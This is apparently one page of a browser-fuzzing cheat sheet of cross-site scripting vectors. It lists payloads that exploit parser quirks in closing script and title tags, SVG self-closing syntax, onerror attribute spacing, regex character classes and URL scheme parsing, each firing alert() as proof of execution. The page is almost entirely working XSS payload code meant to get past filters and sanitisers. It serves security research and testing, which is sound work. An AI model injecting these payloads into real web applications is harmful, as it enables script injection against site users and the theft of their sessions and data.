Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 172 vectors with results
Covers the valid character set and syntax rules for closing script tags in HTML, including case sensitivity, spacing, and common parsing behaviors.

<script>0x0D
a="</script0x09><img src=data: onerror=alert(9)>"0x0D
</script>

<script>0x0D
a="</script
><img src=data: onerror=alert(10)>"0x0D
</script>

<script>0x0D
a="</script0x0C><img src=data: onerror=alert(12)>"0x0D
</script>

<script>0x0D
a="</script0x0D><img src=data: onerror=alert(13)>"0x0D
</script>

<script>0x0D
a="</script ><img src=data: onerror=alert(32)>"0x0D
</script>
This vector uses SVG to determine which characters cause a self closing tag.

<svg /><style><!--</style><img src onerror=alert(47)>
Characters that may be part of HTML tag names after the first character. These are less strict than the first character.
Characters that are possible starts of HTML tag names, for use in "custom tags" on https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
This vector shows which characters are valid whitespace characters in a \s escape sequence.

/^\s+$/.test(String.fromCodePoint(9)) && alert(9)

/^\s+$/.test(String.fromCodePoint(10)) && alert(10)

/^\s+$/.test(String.fromCodePoint(11)) && alert(11)

/^\s+$/.test(String.fromCodePoint(12)) && alert(12)

/^\s+$/.test(String.fromCodePoint(13)) && alert(13)
/\p{scx=Latin}+/gu.test(String.fromCodePoint(i)) && alert(i)

Regex "word" characters may match Unicode characters that get canonicalized to one of the regular characters too with /ui flags: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Regular_expressions/Character_class_escape#w

/\w/ui.test(String.fromCodePoint(i)) && alert(i)
This vector shows which characters are allowed between `</script` and `>` while inside a script tag.

<script>0x0D
a="</script/><img src=data: onerror=alert(47)>"0x0D
</script>

<script>0x0D
a="</script ><img src=data: onerror=alert(32)>"0x0D
</script>

<script>0x0D
a="</script0x0D><img src=data: onerror=alert(13)>"0x0D
</script>

<script>0x0D
a="</script0x0C><img src=data: onerror=alert(12)>"0x0D
</script>

<script>0x0D
a="</script0x09><img src=data: onerror=alert(9)>"0x0D
</script>
These characters make the URI scheme parsing break and return plaintext instead of the parsed URL.

<a id="user_id" href="https:#blah/../../"></a>

<a id="user_id" href="https:%blah/../../"></a>

<a id="user_id" href="https::blah/../../"></a>

<a id="user_id" href="https:<blah/../../"></a>
This XSS vector shows what characters can be used before the onerror event.

<<img src onerror=alert(60)>

<img src onerror=alert(9)0x09style=display:block;content-visibility:auto>

<img src onerror=alert(10)
style=display:block;content-visibility:auto>

<img src onerror=alert(12)0x0Cstyle=display:block;content-visibility:auto>

<img src onerror=alert(13)0x0Dstyle=display:block;content-visibility:auto>

<img src onerror=alert(32) style=display:block;content-visibility:auto>
This vector uses SVG to determine which characters are ignored following the slash, since SVG allows a self closing tag.

<svg //><style><!--</style><img src onerror=alert(47)>

<svg />><style><!--</style><img src onerror=alert(62)>
Characters allowed at </title[here]> without stopping the tag from closing.

<title>abc</title0x09><img src=x onerror=alert(9)>

<title>abc</title
><img src=x onerror=alert(10)>

<title>abc</title0x0C><img src=x onerror=alert(12)>

<title>abc</title0x0D><img src=x onerror=alert(13)>

<title>abc</title ><img src=x onerror=alert(32)>

<div id="x9"><span x="href=0x09>&bbb"></span></div>0x0D
<script>0x0D
window["x9"].innerHTML=window["x9"].innerHTML;0x0D
if (window["x9"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(9)0x0D
}0x0D
</script>

<div id="x10"><span x="href=
>&bbb"></span></div>0x0D
<script>0x0D
window["x10"].innerHTML=window["x10"].innerHTML;0x0D
if (window["x10"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(10)0x0D
}0x0D
</script>

<div id="x12"><span x="href=0x0C>&bbb"></span></div>0x0D
<script>0x0D
window["x12"].innerHTML=window["x12"].innerHTML;0x0D
if (window["x12"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(12)0x0D
}0x0D
</script>

<div id="x13"><span x="href=0x0D>&bbb"></span></div>0x0D
<script>0x0D
window["x13"].innerHTML=window["x13"].innerHTML;0x0D
if (window["x13"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(13)0x0D
}0x0D
</script>

<div id="x32"><span x="href= >&bbb"></span></div>0x0D
<script>0x0D
window["x32"].innerHTML=window["x32"].innerHTML;0x0D
if (window["x32"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(32)0x0D
}0x0D
</script>

Tests whether new URL('javascript://xss.com') can still return the hostname for all characters.

if (new URL("javascript0x09://xss.com").host=="xss.com"){alert(9)}

if (new URL("javascript+://xss.com").host=="xss.com"){alert(43)}

if (new URL("javascript-://xss.com").host=="xss.com"){alert(45)}

if (new URL("javascript.://xss.com").host=="xss.com"){alert(46)}

if (new URL("javascript0://xss.com").host=="xss.com"){alert(48)}
Page 1 of 9